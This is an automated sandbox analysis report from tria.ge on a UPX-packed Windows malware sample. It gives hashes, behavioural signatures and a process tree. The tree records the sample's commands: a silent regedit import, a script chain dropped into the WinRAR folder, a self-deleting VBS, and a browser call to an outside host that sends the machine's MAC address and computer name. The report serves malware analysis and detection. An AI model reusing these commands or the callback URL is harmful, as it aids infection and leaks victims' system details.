Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    153s
  • max time network
    159s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220812-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system
  • submitted
    03/10/2022, 07:00

General

  • Target

    a85f97830728f6474ddc54f283cc52e72534e63d610843a34ab2b0b11ad621a0.exe

  • Size

    31KB

  • MD5

    6e9f388f90ef2c3cb21e43a1caa97604

  • SHA1

    06f497d9b24c2316cc1f2a2f4e1271e7c53c2ae6

  • SHA256

    a85f97830728f6474ddc54f283cc52e72534e63d610843a34ab2b0b11ad621a0

  • SHA512

    b124bae32a984b455b871e47944f8c520236d8f44850ac90c0f727e5b5d04b57352a8fb082bb1a4deccc553353690dfd2c75f9059a8f2e845c8af07c54670378

  • SSDEEP

    768:Vn1eOBcaAtWQtmNukzaUg43B3JQPfbcG1Tiyb2:VnJwWQt+qI3wbcr

Score
8/10
upx

Malware Config

Signatures

  • UPX packed file 2 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops file in Program Files directory 5 IoCs
  • Drops file in Windows directory 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Modifies Internet Explorer settings 1 TTPs 11 IoCs
  • Modifies registry class 64 IoCs
  • Runs .reg file with regedit 1 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of SetWindowsHookEx 7 IoCs
  • Suspicious use of WriteProcessMemory 23 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\a85f97830728f6474ddc54f283cc52e72534e63d610843a34ab2b0b11ad621a0.exe
    "C:\Users\Admin\AppData\Local\Temp\a85f97830728f6474ddc54f283cc52e72534e63d610843a34ab2b0b11ad621a0.exe"
    1⤵
    • Checks computer location settings
    • Drops file in Program Files directory
    • Drops file in Windows directory
    • Modifies registry class
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:5028
    • C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c regedit /s "C:\Program Files\Common Files\tk.reg"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:4160
      • C:\Windows\SysWOW64\regedit.exe
        regedit /s "C:\Program Files\Common Files\tk.reg"
        3⤵
        • Modifies registry class
        • Runs .reg file with regedit
        PID:4952
    • C:\Windows\SysWOW64\Cmd.exe
      Cmd.exe /c CScript /nologo "c:\program files\winrar\pack.wsf" "c:\program files\winrar\1_xyrzqovtw.vstgi" >> "c:\program files\winrar\xyrzqovtw.vstgi"
      2⤵
      • Drops file in Program Files directory
      • Suspicious use of WriteProcessMemory
      PID:4732
      • C:\Windows\SysWOW64\cscript.exe
        CScript /nologo "c:\program files\winrar\pack.wsf" "c:\program files\winrar\1_xyrzqovtw.vstgi"
        3⤵
          PID:3980
      • C:\Windows\SysWOW64\WScript.exe
        "C:\Windows\SysWow64\WScript.exe" "C:\program files\winrar\xyrzqovtw.vstgi"
        2⤵
          PID:4292
        • C:\Program Files\Internet Explorer\iexplore.exe
          "C:\Program Files\Internet Explorer\iexplore.exe" http://u.5136688.com/setuptj.asp?a_ip=&a_mac=7E:D4:F7:B3:35:2B&a_cpname=TMKNGOMU&a_user=me&a_locip=0.0.0.0
          2⤵
          • Modifies Internet Explorer settings
          • Suspicious use of FindShellTrayWindow
          • Suspicious use of SetWindowsHookEx
          • Suspicious use of WriteProcessMemory
          PID:3480
          • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
            "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:3480 CREDAT:17410 /prefetch:2
            3⤵
            • Modifies Internet Explorer settings
            • Suspicious use of SetWindowsHookEx
            PID:540
        • \??\c:\windows\SysWOW64\wscript.exe
          c:\windows\system32\wscript.exe C:\Users\Admin\AppData\Local\Temp\Killme.vbs
          2⤵
            PID:2228

        Network

        MITRE ATT&CK Enterprise v6

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • C:\Program Files\Common Files\tk.reg

          Filesize

          4KB

          MD5

          c9156cce795741ec7e8e16ecc96510d5

          SHA1

          8e77484705c51675c41d65d69e2642655cf70627

          SHA256

          5fcc15bc307da2316d4cb43d97558682e364be8ea67b6270da0bd5b059339d22

          SHA512

          c13e6ed6ae61679b15aedd7ee82bf5da0123e43b914e058d533a05aea0efc6a98c21e934d8d2b8e9211d43e1b8a4760d6cf91e8af7d09e77200958a20f86dad8

        • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776

          Filesize

          471B

          MD5

          afc3e2584b32e1e7c23c33e9534089a5

          SHA1

          ea4e2266d010c300621d2287ea60fe3e9a9ee753

          SHA256

          61597f5f937da250a5ed7b4b82867bebc546a5a35c0029982a003b1e9cbd2e7e

          SHA512

          f0e0d20b15bc390292baf0d93d982315afc466ccd2d4e48152ed65af97aed573d5b9e65b2b50925cbcd2e736955dfec4f63de5739cdb1499eb2db5dfc3cc4fe6

        • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776

          Filesize

          404B

          MD5

          6653b9fc637b8ab2a20de73d4862c41e

          SHA1

          546e9f5e7d3ea0dff4ab18e16dd497f2921d9847

          SHA256

          ccee6a57f1d9a77af169870e4104ba80c1dc0e96ab3ea9a543c656a212f8af0d

          SHA512

          ebecc288f067e4723380ea3cc1832f51610866197e2325db0bbf0d31afc772f83e717415702e6a47ea2e5f9ee055983ae188b9ff553bd71ec376ca5ec6a5b81f

        • C:\Users\Admin\AppData\Local\Temp\Killme.vbs

          Filesize

          307B

          MD5

          afff93f898e03d9b64b1e052fcdcef7d

          SHA1

          ac306b8a8e85949943b53900d82cfd2ba4f7df1a

          SHA256

          ff316f964a1b0e12b5dd359911c44ccb911d5f22f7359de7b916fdce6b5393c5

          SHA512

          0d347643edeb07a386ec5ff3ee7a9264896abbaa6ffc6cf3e3edad5df3d66ae079a3b03e3e1f6ade0feb4d6488e2d42dfe55450cc7540e95a93631a4a2e287a3

        • C:\program files\winrar\xyrzqovtw.vstgi

          Filesize

          75B

          MD5

          15cebf6ec00aa9e792b7aa1a6fd63217

          SHA1

          4fa5de7ae7de703369dad92e1dce3b5ea1f6d434

          SHA256

          c7b5eddd1311bd25322ad19d85ca79dc123e31d5ee4ea4cf04a24bd1c9bfb98a

          SHA512

          f58985e19d3933599e41990fb97f36b642588a7754889a61cff0b3fca89e1807b6dfc61bd046084167c886c37e9f73a3a5d94b1229f0164a5684aabe57a6c649

        • memory/5028-132-0x0000000000400000-0x000000000042A000-memory.dmp

          Filesize

          168KB

        • memory/5028-143-0x0000000000400000-0x000000000042A000-memory.dmp

          Filesize

          168KB